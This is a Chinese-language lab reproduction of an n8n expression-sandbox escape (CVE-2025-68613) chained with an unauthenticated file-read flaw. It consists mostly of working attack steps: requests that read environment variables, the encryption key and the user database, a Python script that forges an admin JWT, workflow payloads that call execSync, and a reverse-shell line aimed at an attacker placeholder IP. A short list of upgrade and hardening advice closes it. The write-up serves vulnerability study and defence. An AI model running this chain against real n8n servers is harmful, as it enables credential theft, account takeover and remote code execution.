n8n表达式沙箱逃逸至RCE漏洞-CVE-2025-68613
简介
n8n是一个开源的工作流自动化平台,允许用户通过可视化节点界面连接各种服务。
CVE-2025-68613是n8n服务端表达式求值引擎中的一个严重漏洞(CVSS 9.9),影响版本0.211.0至1.120.3。n8n允许用户在工作流节点参数中嵌入{{ }}包裹的JavaScript表达式,这些表达式在运行时由服务端求值。由于沙箱隔离不充分,经过身份认证的用户可以构造恶意表达式逃逸预期的执行上下文,访问Node.js的process全局对象,并利用child_process.execSync()以n8n进程权限执行任意操作系统命令。虽然该漏洞需要身份认证,但可以与CVE-2026-21858(通过Content-Type混淆实现的未授权任意文件读取)组合利用,实现未授权远程代码执行。
靶场搭建
n8n Version: 1.65.0
# vulhub
cd vulhub/n8n/CVE-2025-68613
docker-compose up -d
访问 http://ip:5678
管理员账户:admin@vulhub.org / Vulhub123
上传端点:/form/vulnerable-form
vulhub自带exp:exploit.py
复现
联动CVE-2026-21858
CVE-2026-21858:1.65.0 <= n8n < 1.121.0 (NVD - CVE-2026-21858)
往路径 /form/vulnerable-form发送数据包
获取加密密钥
POST /form/vulnerable-form HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
{
"data": {},
"files": {
"f-abc123": {
"filepath": "/proc/self/environ",
"originalFilename": "payload.bin",
"mimetype": "application/octet-stream",
"size": 50000
}
}
}
得出家目录/root,读取 /root/.n8n/config文件,获取加密密钥
{
"encryptionKey": "FgjsgVl8FcUaQrny8/J2rOuNssPIsOen"
}
用户凭据
读取数据库文件
curl -s http://10.143.240.136:5678/form/vulnerable-form -H "Content-Type: application/json" -d '{"data":{},"files":{"f-1":{"filepath":"/root/.n8n/database.sqlite","originalFilename":"a.bin","mimetype":"application/octet-stream","size":50000}}}' -o database.sqlite
获取用户凭据
sqlite3 database.sqlite
sqlite> SELECT id, email, password FROM user WHERE role='global:owner';
360b3c02-7936-457f-a920-25d22121bf82|admin@vulhub.org|$2a$10$rM6Uicv7X.RfH1.YfaQVXuT0JMIHOizbtuMOcFjk3CPvwETigphba
伪造JWT
import jwt, hashlib
from base64 import b64encode
key = "FgjsgVl8FcUaQrny8/J2rOuNssPIsOen"
uid = "360b3c02-7936-457f-a920-25d22121bf82"
email = "admin@vulhub.org"
pw_hash = "$2a$10$rM6Uicv7X.RfH1.YfaQVXuT0JMIHOizbtuMOcFjk3CPvwETigphba"
secret = hashlib.sha256(key[::2].encode()).hexdigest()
h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
print(f"n8n-auth={token}")
生成的token
n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
验证
curl http://10.143.240.136:5678/rest/users -H "Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw"
通过对比发现cookie有效
创建工作流
POST /rest/workflows HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.143.240.136:5678/form/vulnerable-form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Content-Type: application/json
{
"name": "exploit-workflow",
"active": false,
"nodes": [
{
"parameters": {},
"name": "Trigger",
"type": "n8n-nodes-base.manualTrigger",
"typeVersion": 1,
"position": [250, 300]
},
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "={{ (function() { var require = this.process.mainModule.require; var execSync = require(\"child_process\").execSync; return execSync(\"whoami\").toString(); })() }}"
}
]
}
},
"name": "RCE",
"type": "n8n-nodes-base.set",
"typeVersion": 2,
"position": [450, 300]
}
],
"connections": {
"Trigger": {
"main": [
[
{
"node": "RCE",
"type": "main",
"index": 0
}
]
]
}
},
"settings": {}
}
工作流id:h2Ee7iIss7wSfInm
执行工作流
POST /rest/workflows/h2Ee7iIss7wSfInm/run HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.143.240.136:5678/form/vulnerable-form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Content-Type: application/json
{
"workflowData": {
"id": "h2Ee7iIss7wSfInm",
"name": "exploit-workflow",
"active": false,
"nodes": [
{
"parameters": {},
"name": "Trigger",
"type": "n8n-nodes-base.manualTrigger",
"typeVersion": 1,
"position": [250, 300]
},
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "={{ (function() { var require = this.process.mainModule.require; var execSync = require(\"child_process\").execSync; return execSync(\"whoami\").toString(); })() }}"
}
]
}
},
"name": "RCE",
"type": "n8n-nodes-base.set",
"typeVersion": 2,
"position": [450, 300]
}
],
"connections": {
"Trigger": {
"main": [
[
{
"node": "RCE",
"type": "main",
"index": 0
}
]
]
}
},
"settings": {}
}
}
查看结果
记下executionId:39
GET /rest/executions/39 HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
将whoami改为env
反弹shell:
在执行工作流数据包中将 whoami替换成 bash -c 'bash -i >& /dev/tcp/attcker-ip/4343 0>&1'
删除工作流
DELETE /rest/workflows/h2Ee7iIss7wSfInm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Host: 10.143.240.136:5678
Referer: http://10.143.240.136:5678/form/vulnerable-form
手动
在登录页面"F12"打开开发者工具,"应用(Application)"中添加cookie
刷新页面进入管理页面后添加工作流
"Add first step…"
搜索"Manual Trigger"并点击
再搜索"Edit Fields(Set)"并点击
"Drag input fields here or Add Field"
name字段命名为"result",string字段输入
{{ (function(){ return this.process.mainModule.require('child_process').execSync('env').toString() })() }}
选择"Expression","Test step"执行代码
借鉴:复现n8n RCE(CVE-2025-68613)CVSS 9.9漏洞利用详细版-腾讯云开发者社区-腾讯云
exp利用
python exploit.py http://ip:5678 /form/vulnerable-form --cmd env
防御
-
升级到1.122.0 或更高版本
-
仅允许完全可信用户创建和编辑工作流
-
在受控环境中部署 n8n,限制操作系统权限和网络访问
